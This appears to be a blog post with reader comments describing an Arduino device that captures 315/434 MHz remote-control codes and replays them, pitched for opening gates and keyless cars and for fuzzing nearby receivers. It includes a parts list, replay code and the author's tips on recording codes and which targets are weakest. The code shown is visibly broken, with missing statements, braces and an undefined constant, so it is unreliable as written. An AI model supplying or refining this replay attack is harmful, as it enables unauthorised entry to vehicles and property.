RF Sniffer – open gates, cars, and RF remote controlled devices with ease.


The more I get to play with hardware, the more I get to see how security is lacking or implemented poorly (and I’m being very polite here). This time, I would like to share my 315mhz/434mhz RF Sniffer project, which can be used to open poorly protected gates, cars, etc. Nothing new under the sun, only my own take on building such a device.


TIP – The size of the antenna is VERY important. Don’t neglect it – use the right length and use a wave calculator for future reference.


The story

I wanted to see how easy it is to open a keyless car using an Arduino. And then I wanted to simultaneously control multiple appliances operating on different frequencies (315Mhz/434Mhz).

Using the following design, you can easily make a fuzzer to randomly open/close/control all kind of RF receivers out-there. You have been warned.

Current version of the sniffer will resend whatever it sniffs 10 times. Behavior is easily changeable.

I am using the RCSwitch library to reduce heavy thinking on my part. Mission accomplished.


Shopping List

Amount Part Type Properties
2 Inductor wire antenna
1 Red LED – 5mm package 5 mm [THT]; leg yes; color Red (633nm)
1 Arduino Uno (Rev3) type Arduino UNO (Rev3)
1 315Mhz RF-LINK_RX package rf-link_rx; part # WRL-10533
1 434Mhz RF-LINK_RX package rf-link_rx; part # WRL-10532
1 315Mhz RF-LINK_TX package rf-link_tx; part # WRL-10535
1 434Mhz RF-LINK_TX package rf-link_tx; part # WRL-10534



We connect both receivers/transmitters like the following:



And here is the Arduino code. Use at your own risk.

 * RF Sniffer (C) Elia Yehuda 2014
 * This program was coded.
 * No warranty whatsoever.
 * Using this program will cause something, most likely problems.

#include <RCSwitch.h>

// number of times to resend sniffed value. use 0 to disable.

// ye, thats the led pin #
#define LED_PIN 13

// class for 315 receiver & transmitter
RCSwitch rf315Switch = RCSwitch();
// class for 434 receiver & transmitter
RCSwitch rf434Switch = RCSwitch();

void setup()
        // print fast to console

        // 315 receiver on interrupt #0 (pin #2)
        // 315 transmitter on pin #4
        // how many resends
        // 434 receiver on interrupt #1 (pin #3)
        // 434 transmitter on pin #5
        // how many resends
        Serial.println("[+] Listening");

// simple decimal-to-binary-ascii procedure
char *tobin32(unsigned long x)
        static char b[33];
        b[32] = '\0';
        for ( int z = 0; z < 32; z++) {
                b[31 - z] = ((x >> z) & 0x1) ? '1' : '0';
        return b;

void process_rf_value(RCSwitch rfswitch, int rf)
        char str[120];
        unsigned long value;

        // flash a light to show transmission
        digitalWrite(LED_PIN, true);
        value = rfswitch.getReceivedValue();
        if (value) {
                sprintf(str, "[+] %d Received: %s / %010lu / %02d bit / Protocol = %d",
                        rf, tobin32(value), value, rfswitch.getReceivedBitlength(), rfswitch.getReceivedProtocol() );
        } else {
                sprintf(str, "[-] %d Received: Unknown encoding (0)", rf);

        // resend the sniffed value (RESEND_SNIFFED_VALUES times)
        rfswitch.send(value, rfswitch.getReceivedBitlength());
        // reset the switch to allow more data to come
        // stop light to show end of transmission
        digitalWrite(LED_PIN, false);

void loop()

        if (rf315Switch.available()) {
                process_rf_value(rf315Switch, 315);

        if (rf434Switch.available()) {
                process_rf_value(rf434Switch, 434);

9 thoughts on “RF Sniffer – open gates, cars, and RF remote controlled devices with ease.

    1. ofc.

      The hw scheme I provided is 100% same as the one I used in my testings. The sw part is a stripped-down code of my full project, but is enough to get one started.

      With a few modifications to the code, one can simply record the sniffed data instead of immediately resending it. Also, for useful results, when resending, a delay() should be considered for obvious reasons ;)

      Most vulnerable targets I found are remote-controlled gates and old cars. Also weather stations seems to produce a lot of noise.

      Using same logic, one can add 816Mhz tx/rx to cover most widely used RF out there. and rule them all :)

  1. Awesome project. Can u give any details as to how you can save the codes it sniffs? I’m looking to do an automation project and this fits the bill.


  2. simple circuit, simple code – but not flying! receiver not seeing anything? i see chatter on other sites about a 1M resistor between data line and ground and a 330 Mfd cap and production changes on RX board pushing less power thru data line. no joy! any clues???

  3. Ziggy, Really like your project. I have the library, replicated the circuit and code – and quadrupled checked everything – but the receivers are never ‘available’. I have three 315 MHz devices to ‘sniff’ but with/without antennas, placing devices near/far from the antenna and even ordering/installing new RX / TX boards – has no impact on the results. Commenting out the .available test just yields the same data stream regardless of the device I test and, in fact , powering off the circuit has no impact on the data stream. Used SparkFun supplier.
    Please, any hints for me?

    1. I totally understand your frustration since it took me a while and some trial & error to get all to work as smoothly (eg, I too have looked into connecting a resistor to the data line…).

      I think you should first make sure your hw is 100% supported with this library; maybe you need to use a different lib/code to match your receiver – play with the code until you start getting some RAW (hex) data, then adjust it to your purpose.


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s